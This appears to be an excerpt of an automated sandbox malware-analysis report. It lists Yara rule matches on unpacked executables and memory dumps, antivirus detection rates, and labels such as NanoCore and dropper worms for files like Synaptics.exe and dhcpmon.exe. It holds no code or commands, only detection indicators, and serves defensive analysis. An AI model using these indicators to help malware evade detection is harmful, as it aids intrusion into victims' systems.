Source: Yara match | File source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.460036376.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441431426.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.400197509.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.436004480.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459917090.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459034432.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441940953.0000000004711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.440103209.0000000003F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.439646112.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.405483096.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WINDOWS.EXE PID: 7016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6692, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5244, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
            Source: y8kdmHi6x3.exe, Virustotal: Detection: 57%
            Source: y8kdmHi6x3.exe, Metadefender: Detection: 48%
            Source: y8kdmHi6x3.exe, ReversingLabs: Detection: 81%
            Source: y8kdmHi6x3.exe, Avira: detected
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Metadefender: Detection: 88%
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, ReversingLabs: Detection: 97%
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, ReversingLabs: Detection: 92%
            Source: C:\ProgramData\Synaptics\Synaptics.exe, Metadefender: Detection: 48%
            Source: C:\ProgramData\Synaptics\Synaptics.exe, ReversingLabs: Detection: 81%
            Source: C:\Users\user\AppData\Local\Temp\RCX831F.tmp, Metadefender: Detection: 47%
            Source: C:\Users\user\AppData\Local\Temp\RCX831F.tmp, ReversingLabs: Detection: 71%
            Source: C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe, Metadefender: Detection: 48%
            Source: C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe, ReversingLabs: Detection: 81%
            Source: C:\Users\user\Desktop\._cache_Synaptics.exe, ReversingLabs: Detection: 92%
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Metadefender: Detection: 88%
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, ReversingLabs: Detection: 97%
            Source: y8kdmHi6x3.exe, Joe Sandbox ML: detected
            Source: C:\ProgramData\Synaptics\Synaptics.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\Desktop\WINDOWS.EXE, Joe Sandbox ML: detected
            Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\Desktop\SYSTEM32.EXE, Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\yi1yMTqS.exe, Joe Sandbox ML: detected
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Joe Sandbox ML: detected
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\Documents\BNAGMGSPLO\~$cache1, Joe Sandbox ML: detected
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, Joe Sandbox ML: detected
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Joe Sandbox ML: detected
            Source: 21.0.Synaptics.exe.400000.21.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.21.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.21.unpack, Avira: Label: TR/Dropper.Gen
            Source: 7.0.SYSTEM32.EXE.da0000.0.unpack, Avira: Label: TR/Dropper.Gen
            Source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
            Source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
            Source: 23.0.Synaptics.exe.400000.8.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.8.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.8.unpack, Avira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, Avira: Label: TR/Dropper.Gen
            Source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, Avira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.6.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.6.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.6.unpack, Avira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, Avira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, Avira: Label: TR/Dropper.Gen
            Source: 21.2.Synaptics.exe.400000.0.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.2.Synaptics.exe.400000.0.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.2.Synaptics.exe.400000.0.unpack, Avira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.12.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.12.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.12.unpack, Avira: Label: TR/Dropper.Gen
            Source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
            Source: 21.0.Synaptics.exe.400000.12.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.12.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.12.unpack, Avira: Label: TR/Dropper.Gen
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, Avira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.16.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.16.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.16.unpack, Avira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, Avira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.10.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.10.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.10.unpack, Avira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.10.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.10.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.10.unpack, Avira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.14.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.14.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.14.unpack, Avira: Label: TR/Dropper.Gen
            Source: 9.2.WINDOWS.EXE.400000.0.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 9.2.WINDOWS.EXE.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
            Source: 9.2.WINDOWS.EXE.400000.0.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.12.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.12.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.12.unpack, Avira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.31.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.31.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.31.unpack, Avira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.4.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.4.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.4.unpack, Avira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.8.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.8.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.8.unpack, Avira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.8.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.8.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.8.unpack, Avira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.21.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.21.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.21.unpack, Avira: Label: TR/Dropper.Gen
            Source: 23.2.Synaptics.exe.400000.0.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.2.Synaptics.exe.400000.0.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.2.Synaptics.exe.400000.0.unpack, Avira: Label: TR/Dropper.Gen
            Source: 19.0.dhcpmon.exe.e20000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, Avira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.14.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.14.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.14.unpack, Avira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.14.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.14.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.14.unpack, Avira: Label: TR/Dropper.Gen
            Source: 7.2.SYSTEM32.EXE.da0000.0.unpack, Avira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.6.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.6.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.6.unpack, Avira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.4.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.4.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.4.unpack, Avira: Label: TR/Dropper.Gen
            Source: 21.0.Synaptics.exe.400000.16.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.16.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.16.unpack, Avira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, Avira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.21.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.21.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.21.unpack, Avira: Label: TR/Dropper.Gen
            Source: 20.0.Synaptics.exe.400000.26.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.0.Synaptics.exe.400000.26.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.26.unpack, Avira: Label: TR/Dropper.Gen
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, Avira: Label: TR/Dropper.Gen
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, Avira: Label: TR/NanoCore.fadte
            Source: 23.0.Synaptics.exe.400000.4.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.4.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.4.unpack, Avira: Label: TR/Dropper.Gen
            Source: 19.2.dhcpmon.exe.e20000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
            Source: 20.0.Synaptics.exe.400000.6.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
